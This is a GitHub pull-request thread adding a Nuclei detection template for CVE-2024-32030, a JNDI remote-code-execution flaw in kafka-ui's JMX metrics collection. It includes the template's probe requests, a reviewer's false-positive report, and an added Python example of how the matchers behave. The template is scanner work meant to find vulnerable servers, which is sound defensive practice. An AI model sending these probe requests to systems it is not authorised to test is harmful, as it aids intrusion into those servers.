Add CVE-2024-32030 Nuclei Template #10096

Open
wants to merge 1 commit into
base: main


huseyinstif

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO
@DhiyaneshGeek DhiyaneshGeek self-assigned this Jun 24, 2024
@GeorginaReeder

Thanks for your contribution, @huseyinstif!

@DhiyaneshGeek
Member

Hi @huseyinstif

Is it possible to share set-up instructions, like Docker, to set this up locally?

Thanks

@huseyinstif
Author

Hello,
You're welcome, @GeorginaReeder.
Of course, you can find it here, @DhiyaneshGeek:
https://github.com/provectus/kafka-ui

Thank you

@nikilokitokinoki

Hello,
The template gives false-positive results, looking for words that are in the error/exception response.
image_2024-06-24_21-56-21

@huseyinstif
Author

Hello, @nikilokitokinoki
Is it better?

id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve,cve2024,jmx,rce,cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    # Require every matcher below to match; nuclei's default is "or".
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":"malicious-cluster"'
        condition: and
      - type: word
        part: body
        words:
          - '"bootstrapServers":["127.0.0.1:1718"]'
        condition: and
      - type: word
        part: body
        words:
          - '"metrics":{"type":"JMX","port":1718}'
        
  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    # Require every matcher below to match; nuclei's default is "or".
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":"malicious-cluster"'
        condition: and
      - type: word
        part: body
        words:
          - '"bootstrapServers":["127.0.0.1:1718"]'
        condition: and
      - type: word
        part: body
        words:
          - '"metrics":{"type":"JMX","port":1718}'
        
  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    # Require every matcher below to match; nuclei's default is "or".
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"metrics":{'
        condition: and
      - type: word
        part: body
        words:
          - '"jmx":{'
@nikilokitokinoki

Thanks for the reply, can't give a definite answer as I guess my target list is not vulnerable to this CVE (and CVE-2023-52251), but no false positives now.
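
The false positive reported earlier in this thread (word matchers firing on an error/exception response) can be reproduced offline. The following is an added example, not part of the PR or the nuclei project: it models word matchers over two constructed responses, and the `Response` class, both sample bodies and the 200-status check are assumptions made for illustration.

```python
# Added example: models nuclei-style word/status matchers. Responses are constructed.
from dataclasses import dataclass

@dataclass
class Response:
    status: int
    body: str

# Word matchers copied from the first request of the template in this thread.
WORDS = [
    '"name":"malicious-cluster"',
    '"bootstrapServers":["127.0.0.1:1718"]',
    '"metrics":{"type":"JMX","port":1718}',
]

def word_matchers(resp):
    """One boolean per word matcher (part: body)."""
    return [w in resp.body for w in WORDS]

def match_or(resp):
    """nuclei default (matchers-condition: or): any single matcher is enough."""
    return any(word_matchers(resp))

def match_and_status(resp, ok_status=(200,)):
    """Stricter: every word matcher must hold and the status must be expected."""
    return resp.status in ok_status and all(word_matchers(resp))

# Constructed: an error handler that reflects part of the rejected request.
ERROR_ECHO = Response(
    400,
    '{"code":4001,"message":"Invalid value","fieldsErrors":[{"fieldName":"name",'
    '"rejected":{"name":"malicious-cluster"}}]}',
)
# Constructed: the endpoint accepted the object and returned it as stored.
ACCEPTED = Response(
    200,
    '{"name":"malicious-cluster","bootstrapServers":["127.0.0.1:1718"],'
    '"metrics":{"type":"JMX","port":1718}}',
)

if __name__ == "__main__":
    for label, r in (("error echo", ERROR_ECHO), ("accepted", ACCEPTED)):
        print(f"{label:10} or={match_or(r)} and+status={match_and_status(r)}")
```

Even the stricter match only shows that the server echoed back a stored configuration; it does not by itself confirm that the instance is affected by the CVE.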

@huseyinstif
Author

huseyinstif commented Jun 25, 2024

Thanks,

Is there anything you expect from me? @nikilokitokinoki

@nikilokitokinoki

No, thanks for your time)

4 participants